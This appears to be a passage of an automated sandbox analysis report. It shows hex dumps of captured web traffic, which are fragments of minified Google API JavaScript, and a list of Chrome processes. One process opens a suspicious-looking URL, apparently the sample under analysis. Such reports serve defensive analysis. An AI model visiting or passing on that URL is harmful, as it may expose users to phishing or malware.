                                                                                                                                                                                                                                  2024-12-18 19:29:47 UTC1390INData Raw: 74 2c 76 2c 68 29 3b 62 3d 68 2e 69 64 3b 63 3d 5f 2e 43 65 28 29 3b 63 2e 69 64 3d 62 3b 63 2e 75 73 65 72 50 61 72 61 6d 73 3d 68 2e 75 73 65 72 50 61 72 61 6d 73 3b 63 2e 75 72 6c 3d 68 2e 75 72 6c 3b 63 2e 74 79 70 65 3d 68 2e 74 79 70 65 3b 63 2e 73 74 61 74 65 3d 31 3b 5f 2e 54 6e 5b 62 5d 3d 63 3b 62 3d 68 7d 65 6c 73 65 20 62 3d 6e 75 6c 6c 3b 62 26 26 28 28 63 3d 62 2e 69 64 29 26 26 64 2e 70 75 73 68 28 63 29 2c 56 6f 28 61 2c 62 29 29 7d 7d 2c 57 6f 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 26 26 61 2e 6e 6f 64 65 54 79 70 65 3d 3d 3d 31 26 26 62 29 7b 69 66 28 63 29 72 65 74 75 72 6e 20 31 3b 69 66 28 4d 6f 5b 62 5d 29 7b 69 66 28 6a 6f 5b 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 29 72 65
                                                                                                                                                                                                                                  Data Ascii: t,v,h);b=h.id;c=_.Ce();c.id=b;c.userParams=h.userParams;c.url=h.url;c.type=h.type;c.state=1;_.Tn[b]=c;b=h}else b=null;b&&((c=b.id)&&d.push(c),Vo(a,b))}},Wo=function(a,b,c){if(a&&a.nodeType===1&&b){if(c)return 1;if(Mo[b]){if(jo[a.nodeName.toLowerCase()])re
                                                                                                                                                                                                                                  2024-12-18 19:29:47 UTC1390INData Raw: 2e 6e 61 76 69 67 61 74 69 6f 6e 53 74 61 72 74 3b 65 3e 30 26 26 63 3e 3d 65 26 26 28 77 69 6e 64 6f 77 2e 5f 5f 67 61 70 69 5f 6a 73 74 69 6d 69 6e 67 5f 5f 2e 73 72 74 3d 63 2d 65 29 7d 69 66 28 62 29 7b 76 61 72 20 66 3d 77 69 6e 64 6f 77 2e 5f 5f 67 61 70 69 5f 6a 73 74 69 6d 69 6e 67 5f 5f 2e 6c 6f 61 64 3b 0a 65 3e 30 26 26 63 3e 3d 65 26 26 28 66 2e 74 69 63 6b 28 22 5f 77 74 73 72 74 22 2c 76 6f 69 64 20 30 2c 65 29 2c 66 2e 74 69 63 6b 28 22 77 74 73 72 74 5f 22 2c 22 5f 77 74 73 72 74 22 2c 63 29 2c 66 2e 74 69 63 6b 28 22 74 62 73 64 5f 22 2c 22 77 74 73 72 74 5f 22 29 29 7d 74 72 79 7b 62 3d 6e 75 6c 6c 2c 77 69 6e 64 6f 77 2e 63 68 72 6f 6d 65 26 26 77 69 6e 64 6f 77 2e 63 68 72 6f 6d 65 2e 63 73 69 26 26 28 62 3d 4d 61 74 68 2e 66 6c 6f 6f
                                                                                                                                                                                                                                  Data Ascii: .navigationStart;e>0&&c>=e&&(window.__gapi_jstiming__.srt=c-e)}if(b){var f=window.__gapi_jstiming__.load;e>0&&c>=e&&(f.tick("_wtsrt",void 0,e),f.tick("wtsrt_","_wtsrt",c),f.tick("tbsd_","wtsrt_"))}try{b=null,window.chrome&&window.chrome.csi&&(b=Math.floo
                                                                                                                                                                                                                                  2024-12-18 19:29:47 UTC1390INData Raw: 68 65 64 56 69 61 53 70 64 79 26 26 28 64 2b 3d 22 26 70 3d 73 22 29 3b 69 66 28 65 2e 77 61 73 4e 70 6e 4e 65 67 6f 74 69 61 74 65 64 29 7b 64 2b 3d 22 26 6e 70 6e 3d 31 22 3b 76 61 72 20 66 3d 65 2e 6e 70 6e 4e 65 67 6f 74 69 61 74 65 64 50 72 6f 74 6f 63 6f 6c 3b 66 26 26 28 64 2b 3d 22 26 6e 70 6e 76 3d 22 2b 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 7c 7c 65 73 63 61 70 65 29 28 66 29 29 7d 65 2e 77 61 73 41 6c 74 65 72 6e 61 74 65 50 72 6f 74 6f 63 6f 6c 41 76 61 69 6c 61 62 6c 65 26 26 28 64 2b 3d 22 26 61 70 61 3d 31 22 29 7d 76 61 72 20 68 3d 61 2e 74 2c 6b 3d 68 2e 73 74 61 72 74 3b 65 3d 5b 5d 3b 66 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 6c 20 69 6e 20 68 29 69 66 28 6c 21 3d 0a 22 73 74 61 72 74 22 26 26 6c 2e 69 6e 64 65 78 4f 66
                                                                                                                                                                                                                                  Data Ascii: hedViaSpdy&&(d+="&p=s");if(e.wasNpnNegotiated){d+="&npn=1";var f=e.npnNegotiatedProtocol;f&&(d+="&npnv="+(encodeURIComponent||escape)(f))}e.wasAlternateProtocolAvailable&&(d+="&apa=1")}var h=a.t,k=h.start;e=[];f=[];for(var l in h)if(l!="start"&&l.indexOf


                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                  Start time:14:27:38
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                                                                  Imagebase:0x7ff7f9810000
                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                                                  Start time:14:27:38
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1956,i,14440537648066567295,8148106180881864659,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                  Imagebase:0x7ff7f9810000
                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                  Start time:14:27:39
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://52kz793.afratradingagency.com/"
                                                                                                                                                                                                                                  Imagebase:0x7ff7f9810000
                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                                                                  Start time:14:28:56
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4064 --field-trial-handle=1956,i,14440537648066567295,8148106180881864659,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                  Imagebase:0x7ff7f9810000
                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                                                                  Start time:14:28:56
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6200 --field-trial-handle=1956,i,14440537648066567295,8148106180881864659,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                  Imagebase:0x7ff7f9810000
                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  No disassembly